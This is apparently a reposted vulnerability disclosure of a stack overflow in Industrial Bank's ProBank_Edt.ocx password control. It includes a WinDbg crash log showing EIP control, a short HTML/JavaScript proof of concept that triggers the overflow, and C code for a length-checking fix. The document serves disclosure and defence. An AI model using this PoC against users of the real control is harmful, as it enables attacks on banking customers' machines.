A software application in Industrial Bank can directly execute code remotely.

Source: Internet
Author: User


The PkEncryptEPin function of the ProBank_Edt.ocx control of Industrial Bank has a stack overflow.

This causes a stack overflow in which EIP is directly controlled; in the crash below it is set to 0x41414141.

Password control download link: https://personalbank.cib.com.cn/pers/main/resources/js/CIB_Plugin.exe


Crash info (WinDbg):


ModLoad: 03750000 03764000   C:\PROGRA~1\PROBAN~1\PROBAN~1.OCX
ModLoad: 73d30000 73e2e000   C:\WINDOWS\system32\MFC42.DLL
ModLoad: 61be0000 61bed000   C:\WINDOWS\system32\MFC42LOC.DLL
(e10.1ec): Break instruction exception - code 80000003 (first chance)
eax=7ffde000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005
eip=7c92120e esp=036cffcc ebp=036cfff4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\ntdll.dll - 
ntdll!DbgBreakPoint:
7c92120e cc              int     3
Missing image name, possible paged-out or corrupt data.
0:016> g
(e10.f14): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00004000 ebx=77c0f931 ecx=00000875 edx=020dd8dc esi=03878e40 edi=020e0000
eip=03755197 esp=020dd8b8 ebp=0387b030 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\PROGRA~1\PROBAN~1\PROBAN~1.OCX - 
PROBAN_1!DllUnregisterServer+0x3127:
03755197 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:008> g
(e10.f14): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9232bc esi=00000000 edi=00000000
eip=41414141 esp=020dd4e8 ebp=020dd508 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
<Unloaded_pi.dll>+0x41414140:
41414141 ??              ???

Vulnerability PoC:

<object id='obj' classid='CLSID:{8BE81FD3-B85E-CD48-1179-1B592DDE9815}'></object>
<script>
argv1 = "A";
argv2 = "A";
while (argv2.length < 16384) argv2 += argv2;   // grow the second argument to 16 KB of "A"
ret = obj.PkEncryptEPin(argv1, argv2);
</script>



Demo process

Install the control.

Set up a web server, then open poc.html directly in the browser.

The figure above shows the WinDbg crash information.

We can see that EIP is directly controlled, 0x41414141, that is, the ASCII value of the second parameter (0x41 is "A", the character the PoC repeats in argv2).

Solution:

Strictly validate the input parameters: check the length of each string argument against the destination buffer before it is copied, and reject over-long input.
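As an added illustration of that fix (example code written for this note, not the control's own; the buffer size, the length limit and the alphanumeric rule are assumptions), here is the unchecked copy pattern the crash suggests, beside a hardened version that validates before copying:

```c
#include <ctype.h>
#include <stdlib.h>
#include <string.h>

#define EPIN_BUF_SIZE 256   /* assumed stack buffer size; the real value is unknown */
#define EPIN_MAX_LEN  64    /* assumed upper bound for a legitimate ePIN string */

/* Vulnerable pattern the crash log suggests: the caller-controlled second
 * argument is copied into a fixed stack buffer with no length check (the
 * first fault is inside a rep movs), so a 16 KB input overwrites the saved
 * return address and EIP becomes 0x41414141. Kept for contrast only. */
int pk_encrypt_epin_unchecked(const char *epin, size_t len)
{
    char buf[EPIN_BUF_SIZE];
    memcpy(buf, epin, len);          /* no bound on len */
    return 0;                        /* stand-in for the real work */
}

/* Hardened form: check pointer, length and character class before any copy;
 * over-long input is rejected, not truncated. Returns 0 = ok, -1 = rejected. */
int pk_encrypt_epin_checked(const char *epin, size_t len)
{
    char buf[EPIN_BUF_SIZE];
    if (epin == NULL || len == 0 || len > EPIN_MAX_LEN)
        return -1;
    for (size_t i = 0; i < len; i++)
        if (!isalnum((unsigned char)epin[i]))   /* assumed alphanumeric ePIN */
            return -1;
    memcpy(buf, epin, len);          /* len <= EPIN_MAX_LEN < EPIN_BUF_SIZE */
    buf[len] = '\0';
    return 0;
}

/* Feeds a run of len 'A' bytes (the PoC's pattern) to the hardened function
 * and returns its verdict; exercises the rejection without the unchecked path. */
int check_pattern(size_t len)
{
    char *p = malloc(len + 1);
    if (p == NULL) return -2;
    memset(p, 'A', len);
    p[len] = '\0';
    int rc = pk_encrypt_epin_checked(p, len);
    free(p);
    return rc;
}
```

With the PoC's 16384-byte run of "A", check_pattern(16384) returns -1 (rejected before any copy), while a short alphanumeric value such as check_pattern(8) returns 0.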
